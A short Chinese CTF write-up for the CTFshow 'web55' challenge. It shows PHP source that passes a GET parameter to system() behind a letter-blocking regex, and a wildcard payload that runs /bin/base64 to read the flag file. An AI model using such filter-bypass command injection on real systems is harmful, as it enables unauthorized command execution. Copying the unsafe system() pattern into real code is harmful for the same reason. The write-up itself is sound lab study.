目录

  • 源码
  • 思路
  • 题解
  • 总结

源码

<?php/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 20:03:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/// 你们在炫技吗?
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){system($c);}
}else{highlight_file(__FILE__);
}

思路

发现字母被过滤了,我们可以执行/bin/base64输出flag

题解

?c=/???/???64 ???.???

总结

水题

CTFshow 命令执行 web55相关推荐

  1. CTFshow——命令执行

    CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...

  2. CTFshow命令执行29-123

    命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...

  3. CTFshow 命令执行 web72

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

  4. [CTFSHOW]命令执行

    文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...

  5. ctfshow 命令执行 web29-web77 web118-122 web124 wp

    南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...

  6. ctfshow命令执行篇

    web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...

  7. [CTFSHOW]命令执行55-74

    web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...

  8. ctfshow命令执行(持续更新,已更至web39)

    做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...

  9. ctfshow命令执行

    目录 web33:[文件包含] web34: web35: web36:多过滤了0-9的数字,用参数逃逸可以不用数字,用字母就可以成功绕过 ,步骤一样,略 web37: web38: web39: w ...

最新文章

  1. CRM Extension field render and property handling
  2. Groovy新手教程
  3. powerbi发布本地_PowerBI中本地数据的注意事项
  4. 转载:XPath基本语法
  5. mtd_utils交叉编译
  6. android+京东分类菜单,Android仿京东商品分类
  7. python-scrapy模拟登陆网站--登陆青果教务管理系统(三)
  8. 电脑设置显示文件扩展名(文件后缀名)
  9. mysql 外文翻译5000字_MySQL数据库管理外文翻译.doc
  10. 在Vue中如何缓存页面
  11. 中断的概念和机制————(清华大学慕课记录)
  12. 在SQL中修改数据库名称
  13. 天翼云从业认证(4.4)异构双活云灾备实例
  14. Handle机制详解
  15. PHP+Nginx+宝塔+rsync代码同步 实现Nginx负载均衡
  16. 黑群晖私有云NAS:同步百度云盘数据
  17. Ansys Zemax / SPEOS | 光源文件转换器
  18. vue项目依赖安装报错:Error: pngquant failed to build, make sure that libpng-dev is installed
  19. AI软件克隆你的声音,全球诈骗案件已屡次得逞!
  20. 微小区v11.2.5

热门文章

  1. pivot 用order by 语句排序时,老是超时的解决办法,超Easy
  2. C#后台线程和UI的交互
  3. 理解ROS服务和参数---ROS学习第6篇
  4. 射频全网通笔记(附全球频段划分及主要运营商对应表)
  5. WINCE6.0 + S3C2443的启动过程---nboot篇
  6. mysql5.7审计功能开启_MySQL5.7审计功能windows系统
  7. vc++ mfc 非客户区 描绘线_决战客户端技术
  8. 使用Throwable获得栈信息
  9. 用VIM打造C语言编写器
  10. ZJOI2013 防守战线